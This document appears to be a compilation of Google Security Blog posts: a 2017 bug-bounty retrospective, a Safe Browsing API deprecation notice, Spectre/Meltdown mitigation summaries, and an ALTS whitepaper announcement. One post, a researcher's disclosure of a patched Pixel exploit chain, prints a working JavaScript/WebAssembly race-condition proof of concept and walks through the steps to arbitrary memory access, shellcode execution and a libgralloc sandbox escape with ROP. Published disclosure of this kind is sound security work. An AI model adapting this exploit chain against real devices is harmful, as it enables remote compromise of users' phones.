[go: nahoru, domu]


As we kick-off a new year, we wanted to take a moment to look back at the Vulnerability Reward Program in 2017. It joins our past retrospectives for 2014, 2015, and 2016, and shows the course our VRPs have taken.

At the heart of this blog post is a big thank you to the security research community. You continue to help make Google’s users and our products more secure. We looking forward to continuing our collaboration with the community in 2018 and beyond!

2017, By the Numbers

Here’s an overview of how we rewarded researchers for their reports to us in 2017:
We awarded researchers more than 1 million dollars for vulnerabilities they found and reported in Google products, and a similar amount for Android as well. Combined with our Chrome awards, we awarded nearly 3 million dollars to researchers for their reports last year, overall.

Drilling-down a bit further, we awarded $125,000 to more than 50 security researchers from all around the world through our Vulnerability Research Grants Program, and $50,000 to the hard-working folks who improve the security of open-source software as part of our Patch Rewards Program.

A few bug highlights

Every year, a few bug reports stand out: the research may have been especially clever, the vulnerability may have been especially serious, or the report may have been especially fun and quirky!

Here are a few of our favorites from 2017:

  • In August, researcher Guang Gong outlined an exploit chain on Pixel phones which combined a remote code execution bug in the sandboxed Chrome render process with a subsequent sandbox escape through Android’s libgralloc. As part of the Android Security Rewards Program he received the largest reward of the year: $112,500. The Pixel was the only device that wasn’t exploited during last year’s annual Mobile pwn2own competition, and Guang’s report helped strengthen its protections even further.
  • Researcher "gzobqq" received the $100,000 pwnium award for a chain of bugs across five components that achieved remote code execution in Chrome OS guest mode.
  • Alex Birsan discovered that anyone could have gained access to internal Google Issue Tracker data. He detailed his research here, and we awarded him $15,600 for his efforts.

Making Android and Play even safer

Over the course of the year, we continued to develop our Android and Play Security Reward programs.

No one had claimed the top reward for an Android exploit chain in more than two years, so we announced that the greatest reward for a remote exploit chain--or exploit leading to TrustZone or Verified Boot compromise--would increase from $50,000 to $200,000. We also increased the top-end reward for a remote kernel exploit from $30,000 to $150,000.


In October, we introduced the by-invitation-only Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play.


Today, we’re expanding the range of rewards for remote code executions from $1,000 to $5,000. We’re also introducing a new category that includes vulnerabilities that could result in the theft of users’ private data, information being transferred unencrypted, or bugs that result in access to protected app components. We’ll award $1,000 for these bugs. For more information visit the Google Play Security Reward Program site.


And finally, we want to give a shout out to the researchers who’ve submitted fuzzers to the Chrome Fuzzer Program: they get rewards for every eligible bug their fuzzers find without having to do any more work, or even filing a bug.


Given how well things have been going these past years, we look forward to our Vulnerability Rewards Programs resulting in even more user protection in 2018 thanks to the hard work of the security research community.

* Andrew Whalley (Chrome VRP), Mayank Jain (Android Security Rewards), and Renu Chaudhary (Google Play VRP) contributed mightily to help lead these Google-wide efforts.


In May 2016, we introduced the latest version of the Google Safe Browsing API (v4). Since this launch, thousands of developers around the world have adopted the API to protect over 3 billion devices from unsafe web resources.

Coupled with that announcement was the deprecation of legacy Safe Browsing APIs, v2 and v3. Today we are announcing an official turn-down date of October 1st, 2018, for these APIs. All v2 and v3 clients must transition to the v4 API prior to this date.

To make the switch easier, an open source implementation of the Update API (v4) is available on GitHub. Android developers always get the latest version of Safe Browsing’s data and protocols via the SafetyNet Safe Browsing API. Getting started is simple; all you need is a Google Account, Google Developer Console project, and an API key.

For questions or feedback, join the discussion with other developers on the Safe Browsing Google Group. Visit our website for the latest information on Safe Browsing.



[Cross-posted from the Android Developers Blog]

In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues.
All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation.
The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University.
The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.

Technical details of a Pixel remote exploit chain

The Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process.
This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys).

The RCE bug (CVE-2017-5116)

New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access.
The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time.
i::wasm::ModuleWireBytes GetFirstArgumentAsBytes(
    const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) {
  ......
  } else if (source->IsTypedArray()) {    //--->source should be checked if it's backed by a SharedArrayBuffer
    // A TypedArray was passed.
    Local<TypedArray> array = Local<TypedArray>::Cast(source);
    Local<ArrayBuffer> buffer = array->Buffer();
    ArrayBuffer::Contents contents = buffer->GetContents();
    start =
        reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset();
    length = array->ByteLength();
  } 
  ......
  return i::wasm::ModuleWireBytes(start, start + length);
}
A simple PoC is as follows:
<html>
<h1>poc</h1>
<script id="worker1">
worker:{
       self. {
        console.log("worker started");
        var ta = new Uint8Array(arg.data);
        var i =0;
        while(1){
            if(i==0){
                i=1;
                ta[51]=0;   //--->4)modify the webassembly code at the same time
            }else{
                i=0;
                ta[51]=128;
            }
        }
    }
}
</script>
<script>
function getSharedTypedArray(){
    var wasmarr = [
        0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
        0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03,
        0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e,
        0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65,
        0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01,
        0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b,
        0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b];
    var sb = new SharedArrayBuffer(wasmarr.length);           //---> 1)put WebAssembly code in a SharedArrayBuffer
    var sta = new Uint8Array(sb);
    for(var i=0;i<sta.length;i++)
        sta[i]=wasmarr[i];
    return sta;    
}
var blob = new Blob([
        document.querySelector('#worker1').textContent
        ], { type: "text/javascript" })
var worker = new Worker(window.URL.createObjectURL(blob));   //---> 2)create a web worker
var sta = getSharedTypedArray();
worker.postMessage(sta.buffer);                              //--->3)pass the WebAssembly code to the web worker
setTimeout(function(){
        while(1){
        try{
        sta[51]=0;
        var myModule = new WebAssembly.Module(sta);          //--->4)parse the WebAssembly code
        var myInstance = new WebAssembly.Instance(myModule);
        //myInstance.exports.getAnswerPlus1();
        }catch(e){
        }
        }
    },1000);
//worker.terminate(); 
</script>
</html>
The text format of the WebAssembly code is as follows:
00002b func[0]:
00002d: 41 2a                      | i32.const 42
00002f: 0b                         | end
000030 func[1]:
000032: 10 00                      | call 0
000034: 41 01                      | i32.const 1
000036: 6a                         | i32.add
000037: 0b                         | end
First, the above binary format WebAssembly code is put into a SharedArrayBuffer, then a TypedArray Object is created, using the SharedArrayBuffer as buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly Code, the worker thread modifies the SharedArrayBuffer at the same time. Under this circumstance, a race condition causes a TOCTOU issue. After the main thread's bound check, the instruction " call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs.
Because the "call 0" Web Assembly instruction can be modified to call any other Web Assembly functions, the exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped to Web Assembly memory. Because function 0 and function $leak have a different number of arguments, this results in many useful pieces of data in the stack being leaked.
 (func $leak(param i32 i32 i32 i32 i32 i32)(result i32)
    i32.const 0
    get_local 0
    i32.store
    i32.const 4
    get_local 1
    i32.store
    i32.const 8
    get_local 2
    i32.store
    i32.const 12
    get_local 3
    i32.store
    i32.const 16
    get_local 4
    i32.store
    i32.const 20
    get_local 5
    i32.store
    i32.const 0
  ))
Not only the instruction "call 0" can be modified, any "call funcx" instruction can be modified. Assume funcx is a wasm function with 6 arguments as follows, when v8 compiles funcx in ia32 architecture, the first 5 arguments are passed through the registers and the sixth argument is passed through stack. All the arguments can be set to any value by JavaScript:
/*Text format of funcx*/
 (func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32)
    get_local 5
    get_local 4
    i32.add)
/*Disassembly code of funcx*/
--- Code ---
kind = WASM_FUNCTION
name = wasm#1
compiler = turbofan
Instructions (size = 20)
0x58f87600     0  8b442404       mov eax,[esp+0x4]
0x58f87604     4  03c6           add eax,esi
0x58f87606     6  c20400         ret 0x4
0x58f87609     9  0f1f00         nop
Safepoints (size = 8)
RelocInfo (size = 0)
--- End code ---
When a JavaScript function calls a WebAssembly function, v8 compiler creates a JS_TO_WASM function internally, after compilation, the JavaScript function will call the created JS_TO_WASM function and then the created JS_TO_WASM function will call the WebAssembly function. JS_TO_WASM functions use different call convention, its first arguments is passed through stack. If "call funcx" is modified to call the following JS_TO_WASM function.
/*Disassembly code of JS_TO_WASM function */
--- Code ---
kind = JS_TO_WASM_FUNCTION
name = js-to-wasm#0
compiler = turbofan
Instructions (size = 170)
0x4be08f20     0  55             push ebp
0x4be08f21     1  89e5           mov ebp,esp
0x4be08f23     3  56             push esi
0x4be08f24     4  57             push edi
0x4be08f25     5  83ec08         sub esp,0x8
0x4be08f28     8  8b4508         mov eax,[ebp+0x8]
0x4be08f2b     b  e8702e2bde     call 0x2a0bbda0  (ToNumber)    ;; code: BUILTIN
0x4be08f30    10  a801           test al,0x1
0x4be08f32    12  0f852a000000   jnz 0x4be08f62  <+0x42>
The JS_TO_WASM function will take the sixth arguments of funcx as its first argument, but it takes its first argument as an object pointer, so type confusion will be triggered when the argument is passed to the ToNumber function, which means we can pass any values as an object pointer to the ToNumber function. So we can fake an ArrayBuffer object in some address such as in a double array and pass the address to ToNumber. The layout of an ArrayBuffer is as follows:
/* ArrayBuffer layouts 40 Bytes*/                                                                                                                         
Map                                                                                                                                                       
Properties                                                                                                                                                
Elements                                                                                                                                                  
ByteLength                                                                                                                                                
BackingStore                                                                                                                                              
AllocationBase                                                                                                                                            
AllocationLength                                                                                                                                          
Fields                                                                                                                                                    
internal                                                                                                                                                  
internal                                                                                                                                                                                                                                                                                                      
/* Map layouts 44 Bytes*/                                                                                                                                   
static kMapOffset = 0,                                                                                                                                    
static kInstanceSizesOffset = 4,                                                                                                                          
static kInstanceAttributesOffset = 8,                                                                                                                     
static kBitField3Offset = 12,                                                                                                                             
static kPrototypeOffset = 16,                                                                                                                             
static kConstructorOrBackPointerOffset = 20,                                                                                                              
static kTransitionsOrPrototypeInfoOffset = 24,                                                                                                            
static kDescriptorsOffset = 28,                                                                                                                           
static kLayoutDescriptorOffset = 1,                                                                                                                       
static kCodeCacheOffset = 32,                                                                                                                             
static kDependentCodeOffset = 36,                                                                                                                         
static kWeakCellCacheOffset = 40,                                                                                                                         
static kPointerFieldsBeginOffset = 16,                                                                                                                    
static kPointerFieldsEndOffset = 44,                                                                                                                      
static kInstanceSizeOffset = 4,                                                                                                                           
static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5,                                                                                           
static kUnusedOffset = 6,                                                                                                                                 
static kVisitorIdOffset = 7,                                                                                                                              
static kInstanceTypeOffset = 8,     //one byte                                                                                                            
static kBitFieldOffset = 9,                                                                                                                               
static kInstanceTypeAndBitFieldOffset = 8,                                                                                                                
static kBitField2Offset = 10,                                                                                                                             
static kUnusedPropertyFieldsOffset = 11
Because the content of the stack can be leaked, we can get many useful data to fake the ArrayBuffer. For example, we can leak the start address of an object, and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer's properties and elements fields. We have to fake the map of the ArrayBuffer too, luckily, most of the fields of the map are not used when the bug is triggered. But the InstanceType in offset 8 has to be set to 0xc3(this value depends on the version of v8) to indicate this object is an ArrayBuffer. In order to get a reference of the faked ArrayBuffer in JavaScript, we have to set the Prototype field of Map in offset 16 to an object whose Symbol.toPrimitive property is a JavaScript call back function. When the faked array buffer is passed to the ToNumber function, to convert the ArrayBuffer object to a Number, the call back function will be called, so we can get a reference of the faked ArrayBuffer in the call back function. Because the ArrayBuffer is faked in a double array, the content of the array can be set to any value, so we can change the field BackingStore and ByteLength of the faked array buffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple. As JIT Code in Chrome is readable, writable and executable, we can overwrite it to execute shellcode.
Chrome team fixed this bug very quickly in chrome 61.0.3163.79, just a week after I submitted the exploit.

The EoP Bug (CVE-2017-14904)

The sandbox escape bug is caused by map and unmap mismatch, which causes a Use-After-Unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap:
static int gralloc_map(gralloc_module_t const* module,
                       buffer_handle_t handle)
{ ……
    private_handle_t* hnd = (private_handle_t*)handle;
    ……
    if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) &&
        !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) {
        size = hnd->size;
        err = memalloc->map_buffer(&mappedAddress, size,
                                       hnd->offset, hnd->fd);        //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process.
        if(err || mappedAddress == MAP_FAILED) {
            ALOGE("Could not mmap handle %p, fd=%d (%s)",
                  handle, hnd->fd, strerror(errno));
            return -errno;
        }
        hnd->base = uint64_t(mappedAddress) + hnd->offset;          //---> save mappedAddress+offset to hnd->base
    } else {
        err = -EACCES;
}
……
    return err;
}
gralloc_map maps a graphic buffer controlled by the arguments handle to memory space and gralloc_unmap unmaps it. While mapping, the mappedAddress plus hnd->offset is stored to hnd->base, but while unmapping, hnd->base is passed to system call unmap directly minus the offset. hnd->offset can be manipulated from a Chrome's sandboxed process, so it's possible to unmap any pages in system_server from Chrome's sandboxed render process.
static int gralloc_unmap(gralloc_module_t const* module,
                         buffer_handle_t handle)
{
  ……
    if(hnd->base) {
        err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset);    //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched.
        if (err) {
            ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base,
                    strerror(errno));
            return -errno;
        }
        hnd->base = 0;
}
……
    return 0;
}
int IonAlloc::unmap_buffer(void *base, unsigned int size,
        unsigned int /*offset*/)                              
//---> look, offset is not used by unmap_buffer
{
    int err = 0;
    if(munmap(base, size)) {
        err = -errno;
        ALOGE("ion: Failed to unmap memory at %p : %s",
              base, strerror(errno));
    }
    return err;
}
Although SeLinux restricts the domain isolated_app to access most of Android system service, isolated_app can still access three Android system services.
52neverallow isolated_app {
53    service_manager_type
54    -activity_service
55    -display_service
56    -webviewupdate_service
57}:service_manager find;
To trigger the aforementioned Use-After-Unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parseable into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered.
This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app.
To exploit this EoP bug:
1. Address space shaping. Make the address space layout look as follows, a heap chunk is right above some continuous ashmem mapping:
7f54600000-7f54800000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f58000000-7f54a00000 rw-s 001fe000 00:04 32783         /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781         /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779         /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777         /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775         /dev/ashmem/360alpha25 (deleted)
......
2. Unmap part of the heap (1 KB) and part of an ashmem memory (2MB–1KB) by triggering the bug:
7f54400000-7f54600000 rw-s 00000000 00:04 31603         /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
//--->There is a 2MB memory gap
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)
3. Fill the unmapped space with an ashmem memory:
7f54400000-7f54600000 rw-s 00000000 00:04 31603      /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0         [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605       /dev/ashmem/360alpha1001 (deleted)  
//--->The gap is filled with the ashmem memory 360alpha1001
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783      /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781      /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779      /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777      /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775      /dev/ashmem/360alpha25 (deleted)
4. Spray the heap and the heap data will be written to the ashmem memory:
7f54400000-7f54600000 rw-s 00000000 00:04 31603        /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605          /dev/ashmem/360alpha1001 (deleted)
//--->the heap manager believes the memory range from 0x7f547ff000 to 0x7f54800000 is still mongered by it and will allocate memory from this range, result in heap data is written to ashmem memory
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)
5. Because the filled ashmem in step 3 is mapped both by system_server and render process, part of the heap of system_server can be read and written by render process and we can trigger system_server to allocate some GraphicBuffer object in ashmem. As GraphicBuffer is inherited from ANativeWindowBuffer, which has a member named common whose type is android_native_base_t, we can read two function points (incRef and decRef) from ashmem memory and then can calculate the base address of the module libui. In the latest Pixel device, Chrome's render process is still 32-bit process but system_server is 64-bit process. So we have to leak some module's base address for ROP. Now that we have the base address of libui, the last step is to trigger ROP. Unluckily, it seems that the points incRef and decRef haven't been used. It's impossible to modify it to jump to ROP, but we can modify the virtual table of GraphicBuffer to trigger ROP.
typedef struct android_native_base_t
{
    /* a magic value defined by the actual EGL native type */
    int magic;
    /* the sizeof() of the actual EGL native type */
    int version;
    void* reserved[4];
    /* reference-counting interface */
    void (*incRef)(struct android_native_base_t* base);
    void (*decRef)(struct android_native_base_t* base);
} android_native_base_t;
6.Trigger a GC to execute ROP
When a GraphicBuffer object is deconstructed, the virtual function onLastStrongRef is called, so we can replace this virtual function to jump to ROP. When GC happens, the control flow goes to ROP. Finding an ROP chain in limited module(libui) is challenging, but after hard work, we successfully found one and dumped the contents of the file into /data/misc/wifi/wpa_supplicant.conf .

Summary

The Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 Security Update. Supported Google device and devices with the security patch level of 2017-12-05 or later address these issues. While parsing untrusted parcels still happens in sensitive locations, the Android security team is working on hardening the platform to mitigate against similar vulnerabilities.
The EoP bug was discovered thanks to a joint effort between 360 Alpha Team and 360 C0RE Team. Thanks very much for their effort.



Yesterday, Google’s Project Zero team posted detailed technical information on three variants of a new security issue involving speculative execution on many modern CPUs. Today, we’d like to share some more information about our mitigations and performance.

In response to the vulnerabilities that were discovered we developed a novel mitigation called “Retpoline” -- a binary modification technique that protects against “branch target injection” attacks. We shared Retpoline with our industry partners and have deployed it on Google’s systems, where we have observed negligible impact on performance.

In addition, we have deployed Kernel Page Table Isolation (KPTI) -- a general purpose technique for better protecting sensitive information in memory from other software running on a machine -- to the entire fleet of Google Linux production servers that support all of our products, including Search, Gmail, YouTube, and Google Cloud Platform.

There has been speculation that the deployment of KPTI causes significant performance slowdowns. Performance can vary, as the impact of the KPTI mitigations depends on the rate of system calls made by an application. On most of our workloads, including our cloud infrastructure, we see negligible impact on performance.

In our own testing, we have found that microbenchmarks can show an exaggerated impact. Of course, Google recommends thorough testing in your environment before deployment; we cannot guarantee any particular performance or operational impact.

Speculative Execution and the Three Methods of Attack

In addition, to follow up on yesterday’s post, today we’re providing a summary of speculative execution and how each of the three variants work.

In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.

Project Zero discussed three variants of speculative execution attack. There is no single fix for all three attack variants; each requires protection independently.

  • Variant 1 (CVE-2017-5753), “bounds check bypass.” This vulnerability affects specific sequences within compiled applications, which must be addressed on a per-binary basis.
  • Variant 2 (CVE-2017-5715), “branch target injection”. This variant may either be fixed by a CPU microcode update from the CPU vendor, or by applying a software mitigation technique called “Retpoline” to binaries where concern about information leakage is present. This mitigation may be applied to the operating system kernel, system programs and libraries, and individual software programs, as needed.
  • Variant 3 (CVE-2017-5754), “rogue data cache load.” This may require patching the system’s operating system. For Linux there is a patchset called KPTI (Kernel Page Table Isolation) that helps mitigate Variant 3. Other operating systems may implement similar protections - check with your vendor for specifics.

Summary
Mitigation
Variant 1: bounds check bypass (CVE-2017-5753)
This attack variant allows malicious code to circumvent bounds checking features built into most binaries. Even though the bounds checks will still fail, the CPU will speculatively execute instructions after the bounds checks, which can access memory that the code could not normally access. When the CPU determines the bounds check has failed, it discards any work that was done speculatively; however, some changes to the system can be still observed (in particular, changes to the state of the CPU caches). The malicious code can detect these changes and read the data that was speculatively accessed.

The primary ramification of Variant 1 is that it is difficult for a system to run untrusted code within a process and restrict what memory within the process the untrusted code can access.

In the kernel, this has implications for systems such as the extended Berkeley Packet Filter (eBPF) that takes packet filterers from user space code, just-in-time (JIT) compiles the packet filter code, and runs the packet filter within the context of kernel. The JIT compiler uses bounds checking to limit the memory the packet filter can access, however, Variant 1 allows an attacker to use speculation to circumvent these limitations.

Mitigation requires analysis and recompilation so that vulnerable binary code is not emitted. Examples of targets which may require patching include the operating system and applications which execute untrusted code.
Variant 2: branch target injection (CVE-2017-5715)
This attack variant uses the ability of one process to influence the speculative execution behavior of code in another security context (i.e., guest/host mode, CPU ring, or process) running on the same physical CPU core.

Modern processors predict the destination for indirect jumps and calls that a program may take and start speculatively executing code at the predicted location. The tables used to drive prediction are shared between processes running on a physical CPU core, and it is possible for one process to pollute the branch prediction tables to influence the branch prediction of another process or kernel code.

In this way, an attacker can cause speculative execution of any mapped code in another process, in the hypervisor, or in the kernel, and potentially read data from the other protection domain using techniques like Variant 1. This variant is difficult to use, but has great potential power as it crosses arbitrary protection domains.
Mitigating this attack variant requires either installing and enabling a CPU microcode update from the CPU vendor (e.g., Intel's IBRS microcode), or applying a software mitigation (e.g., Google's Retpoline) to the hypervisor, operating system kernel, system programs and libraries, and user applications.
Variant 3: rogue data cache load (CVE-2017-5754)
This attack variant allows a user mode process to access virtual memory as if the process was in kernel mode. On some processors, the speculative execution of code can access memory that is not typically visible to the current execution mode of the processor; i.e., a user mode program may speculatively access memory as if it were running in kernel mode.

Using the techniques of Variant 1, a process can observe the memory that was accessed speculatively. On most operating systems today, the page table that a process uses includes access to most physical memory on the system, however access to such memory is limited to when the process is running in kernel mode. Variant 3 enables access to such memory even in user mode, violating the protections of the hardware.
Mitigating this attack variant requires patching the operating system. For Linux, the patchset that mitigates Variant 3 is called Kernel Page Table Isolation (KPTI). Other operating systems/providers should implement similar mitigations.

Mitigations for Google products

You can learn more about mitigations that have been applied to Google’s infrastructure, products, and services here.



[Google Cloud, G Suite, and Chrome customers can visit the Google Cloud blog for details about those products]
[For more technical details about this issue, please read Project Zero's blog post]

Last year, Google’s Project Zero team discovered serious security flaws caused by “speculative execution,” a technique used by most modern processors (CPUs) to optimize performance.

The Project Zero researcher, Jann Horn, demonstrated that malicious actors could take advantage of speculative execution to read system memory that should have been inaccessible. For example, an unauthorized party may read sensitive information in the system’s memory such as passwords, encryption keys, or sensitive information open in applications. Testing also showed that an attack running on one virtual machine was able to access the physical memory of the host machine, and through that, gain read-access to the memory of a different virtual machine on the same host.

These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running on them.

As soon as we learned of this new class of attack, our security and product development teams mobilized to defend Google’s systems and our users’ data. We have updated our systems and affected products to protect against this new type of attack. We also collaborated with hardware and software manufacturers across the industry to help protect their users and the broader web. These efforts have included collaborative analysis and the development of novel mitigations.

We are posting before an originally coordinated disclosure date of January 9, 2018 because of existing public reports and growing speculation in the press and security research community about the issue, which raises the risk of exploitation. The full Project Zero report is forthcoming (update: this has been published; see above).

Mitigation status for Google products

A list of affected Google products and their current status of mitigation against this attack appears here. As this is a new class of attack, our patch status refers to our mitigation for currently known vectors for exploiting the flaw. The issue has been mitigated in many products (or wasn’t a vulnerability in the first place). In some instances, users and customers may need to take additional steps to ensure they’re using a protected version of a product. This list and a product’s status may change as new developments warrant. In the case of new developments, we will post updates to this blog.

  • All Google products not explicitly listed below require no user or customer action.
  • Android
    • Devices with the latest security update are protected. Furthermore, we are unaware of any successful reproduction of this vulnerability that would allow unauthorized information disclosure on ARM-based Android devices.
    • Supported Nexus and Pixel devices with the latest security update are protected.
    • Further information is available here.
  • Google Apps / G Suite (Gmail, Calendar, Drive, Sites, etc.):
    • No additional user or customer action needed.
  • Google Chrome
    • Some user or customer action needed. More information here.
  • Google Chrome OS (e.g., Chromebooks):
    • Some additional user or customer action needed. More information here.
  • Google Cloud Platform
    • Google App Engine: No additional customer action needed.
    • Google Compute Engine: Some additional customer action needed. More information here.
    • Google Kubernetes Engine: Some additional customer action needed. More information here.
    • Google Cloud Dataflow: Some additional customer action needed. More information here.
    • Google Cloud Dataproc: Some additional customer action needed. More information here
    • All other Google Cloud products and services: No additional action needed.
  • Google Home / Chromecast:
    • No additional user action needed.
  • Google Wifi/OnHub:
    • No additional user action needed.
Multiple methods of attack

To take advantage of this vulnerability, an attacker first must be able to run malicious code on the targeted system.

The Project Zero researchers discovered three methods (variants) of attack, which are effective under different conditions. All three attack variants can allow a process with normal user privileges to perform unauthorized reads of memory data, which may contain sensitive information such as passwords, cryptographic key material, etc.

In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.

There is no single fix for all three attack variants; each requires protection independently. Many vendors have patches available for one or more of these attacks.

We will continue our work to mitigate these vulnerabilities and will update both our product support page and this blog post as we release further fixes. More broadly, we appreciate the support and involvement of all the partners and Google engineers who worked tirelessly over the last few months to make our users and customers safe.

Blog post update log

  • Added link to Project Zero blog
  • Added link to Google Cloud blog


At Google, protection of customer data is a top priority. One way we do this is by protecting data in transit by default. We protect data when it is sent to Google using secure communication protocols such as TLS (Transport Layer Security). Within our infrastructure, we protect service-to-service communications at the application layer using a system called Application Layer Transport Security (ALTS). ALTS authenticates the communication between Google services and helps protect data in transit. Today, we’re releasing a whitepaper, “Application Layer Transport Security,” that goes into detail about what ALTS is, how it protects data, and how it’s implemented at Google.

